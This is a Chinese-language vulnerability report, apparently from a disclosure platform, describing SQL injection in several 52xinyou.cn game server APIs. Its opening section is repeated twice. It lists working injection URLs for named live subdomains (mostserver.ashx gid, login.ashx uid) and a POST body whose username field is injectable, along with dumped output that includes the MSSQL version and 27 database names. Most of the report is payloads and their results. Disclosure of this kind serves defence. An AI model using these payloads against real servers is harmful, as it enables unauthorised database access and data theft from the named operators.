### 简要描述: 我也来多处注入吧。已在多个服务器上测试成功,我也不知道前面的哥们提交过哪个了因为都还没修复 ### 详细说明: 注入点1:api/mostserver.ashx 暴mssql版本号,gid参数: http://ht.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy001.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy002.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy003.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy004.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy005.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy006.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 [<img src="https://images.seebug.org/upload/201401/15192001789f8869fdf0dfdc3ccaa2d00e5b14de.jpg" alt="20140115191906.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15192001789f8869fdf0dfdc3ccaa2d00e5b14de.jpg) Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (Intel X86) Apr 2 2010 15:53:02 Copyright (c) Microsoft Corporation Data...
### 简要描述: 我也来多处注入吧。已在多个服务器上测试成功,我也不知道前面的哥们提交过哪个了因为都还没修复 ### 详细说明: 注入点1:api/mostserver.ashx 暴mssql版本号,gid参数: http://ht.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy001.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy002.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy003.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy004.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy005.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy006.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 [<img src="https://images.seebug.org/upload/201401/15192001789f8869fdf0dfdc3ccaa2d00e5b14de.jpg" alt="20140115191906.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/15192001789f8869fdf0dfdc3ccaa2d00e5b14de.jpg) Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (Intel X86) Apr 2 2010 15:53:02 Copyright (c) Microsoft Corporation Data Center Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2) (Hypervisor) 注入点2: http://xy006.52xinyou.cn/api/webaction.ashx posttype=find_pwd1&username=1&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=1&button2=%E6%8F%90+%E4%BA%A4 username存在注入。 暴出的数据: available databases [27]: [*] ht.52xinyou.com [*] master [*] max [*] mf001 [*] model [*] msdb [*] old.del [*] ReportServer [*] ReportServerTempDB [*] tempdb [*] v3.10.18 [*] v3.11.11 [*] v3.11.19 [*] v31125 [*] v31204 [*] wan110 [*] xy001_12_5 [*] xy002_12_5 ………… 其它服务器雷同。 ### 漏洞证明: 注入点3: 还是暴版本号 uid参数 http://ht.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&_=1389776637531 http://xy001.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&_=1389776637531 http://xy002.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&_=1389776637531 http://xy003.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&_=1389776637531 http://xy004.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&_=1389776637531 http://xy005.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&_=1389776637531 http://xy006.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&_=1389776637531 [<img src="https://images.seebug.org/upload/201401/1519264467bd03a18d476bc6ef4a0e47a33a474b.jpg" alt="20140115192637.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201401/1519264467bd03a18d476bc6ef4a0e47a33a474b.jpg)
